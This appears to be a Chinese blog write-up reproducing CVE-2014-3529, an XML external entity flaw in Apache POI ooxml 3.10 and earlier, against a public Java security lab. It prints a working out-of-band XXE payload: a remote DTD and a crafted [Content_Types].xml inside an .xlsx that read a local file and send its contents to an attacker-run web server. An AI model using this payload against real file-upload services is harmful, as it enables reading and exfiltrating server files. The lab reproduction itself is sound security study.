CVE-2014-3529

一、 漏洞影响

poi-ooxml3.10及以下

二、环境搭建
1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取
2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.80.130/%file;'>">
%all;

image-20220228213820652

3. 制作包含payload的Excel
  • 新建一个Excel文档xxe.xlsx,修改后缀为zip后解压,解压后的目录结构如下

    image-20220228213342134

  • 在[Content_Types].xml中添加payload

    <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///C:/1.txt"> 
    <!ENTITY % dtd SYSTEM "http://192.168.80.130/xxe.dtd">
    %dtd; %send;]>
    

    image-20220228213619242

  • 再将所有文件压缩成zip,修改后缀为xlsx

    image-20220228214012220

三、漏洞复现
1. 访问靶场127.0.0.1:8080/ooxml/upload
2. 上传xxe.xlsx文件

image-20220228214319800

5. web服务器端可以通过访问记录看到xxe执行的结果

image-20220228214807214

四、其他

1. 文件读取外带数据只能带单行数据,所以没有读取win.ini
2. 3.13版本测试不存在漏洞,网上的应该只是官网的一个演示用例存在漏洞
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值